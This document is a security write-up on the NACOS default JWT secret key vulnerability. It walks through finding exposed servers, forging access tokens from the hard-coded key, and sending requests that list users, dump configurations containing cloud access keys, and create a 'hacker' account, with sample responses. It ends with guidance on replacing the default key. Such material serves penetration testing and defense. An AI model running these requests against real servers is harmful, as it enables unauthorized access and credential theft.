1. Principle of NACOS
NACOS[1], /nɑ:kəʊs/, is a dynamic service discovery, configuration management, and service management platform that is easier for building cloud-native applications.
In versions <=2.2.0 and <=1.4.4, the NACOS configuration file conf/application.properties contains a default key nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789.
This key is used to encrypt user accounts and generate the access token for user login authentication. The type is JWT[2] (JSON Web Token).
An attacker can use the default key and common accounts to generate an access token, thereby bypassing authentication and gaining direct access to NACOS.
2. Impact of NACOS
Once the attacker gains access to NACOS, they can view all configuration files managed by NACOS, searching for account passwords inside, such as cloud service’s AKSK and Java programs’ JDBC, thus obtaining access to corresponding services.
3. NACOS Attack
3.1. Asset Discovery with NACOS
Search for Assets
FOFA[3]: app="NACOS"
View Version
# Request URL
/nacos/v1/console/server/state
# Response Example
{"version":"2.2.0","standalone_mode":"standalone","function_mode":null}
3.2. Exploit
Deploy Service
1. Download Link: 2.2.0 (Dec 14, 2022)[4], 1.4.4 (Aug 8th, 2022)[5]
2. Enable Authentication: Set nacos.core.auth.enabled to on in the configuration file conf/application.properties.
3.1. Deploy on Linux: Configure environment variable export JAVA_HOME=/usr/lib/jvm/java-17-openjdk-amd64, start service bash bin/startup.sh -m standalone, stop service bash bin/shutdown.sh.
3.2. Deploy on Windows: Configure environment variable This PC - Properties - Advanced system settings - Advanced - Environment Variables – JAVA_HOME= C:\Program Files\Java\jdk1.8.0_361, start service bin/startup.cmd-m standalone, stop service bin\shutdown.cmd .
Generate accessToken
Generation site: JWT website[6]
Key Parameters:
1. Common Accounts: e.g., nacos, nac0s, nacosss, nacos1, admin
2. Default Key: SecretKey012345678901234567890123456789012345678901234567890123456789
Other Parameters:
3. Signature Algorithm: HS256 (HMAC SHA256, default for JWT)
4. Expiry Time: Use command in Linux date +%s -d '2024-03-10 00:00:00' to generate expiry time
5. Enable Base64 Encoding: Yes (recommended by NACOS)
View Accounts: Often used in penetration testing or vulnerability scanning to verify the existence of vulnerabilities.
# Request URL (GET)
/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDAwMDAwMH0.l5OewNgzUxgyFdy7aAQBNfst7FOZ9bE9cHoLd9dMX74 &pageNo=1&pageSize=9&search=accurate
# Response Example
{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}
View Configurations: Often used in red team engagements to search for account passwords and gain more permissions.
# Request URL (GET)
/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDAwMDAwMH0.l5OewNgzUxgyFdy7aAQBNfst7FOZ9bE9cHoLd9dMX74
# Response Example
{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"id":"740458855550423040","dataId":"aliyun.yaml","group":"DEFAULT_GROUP","content":"aliyun:\n access-key-id: RzRRFE5tQqsxAieELkMDLTAI\n access-key-secret: 52dW2iDdPzmddUBEDlKHej5uYddK89","md5":null,"encryptedDataKey":null,"tenant":"","appName":"","type":"yaml"}]}
Create Account, Log into Backend, View Configurations: Similar to red team scenarios.
# Request URL (POST)
/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwOTk5MTEwOX0.h2WWx4rr9_pxbYzRe2Psrw5JDY3mKzXiUK-FhMKCkto&username=hacker&password=123456
# Response Example
{"code":200,"message":null,"data":"create user ok!"}
4. Defense
Generating an access token requires two key parameters: user account and encryption key. Simply modifying the default encryption key prevents attackers from forging access tokens, thus fixing this vulnerability.
The content below references the Nacos Documentation[7] under the custom key section and the Nacos default token.secret.key and server.identity risk explanation and resolution announcement[8].
Location to Modify Default Key
Configuration file: conf/application.properties
Default key:
### The default token(Base64 String):
nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
### After version 2.1.0
nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789Considerations for Modifying Default Key
1. The original key length must not be less than 32 characters. It is recommended to Base64 encode the original key, for example:
### Original key (exactly 32 characters)
ThisIsMyCustomSecretKey012345678
### The default token(Base64 String):
nacos.core.auth.default.token.secret.key=VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=
### After version 2.1.0
nacos.core.auth.plugin.nacos.token.secret.key=VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=2. The authentication switch takes effect immediately after being modified, and no server restart is needed.
3. When dynamically modifying token.secret.key, ensure the token is valid. Changing it to an invalid value will make future logins impossible and cause access errors.
4. The key must be consistent among nodes; long-term inconsistency may lead to a 403 invalid token error.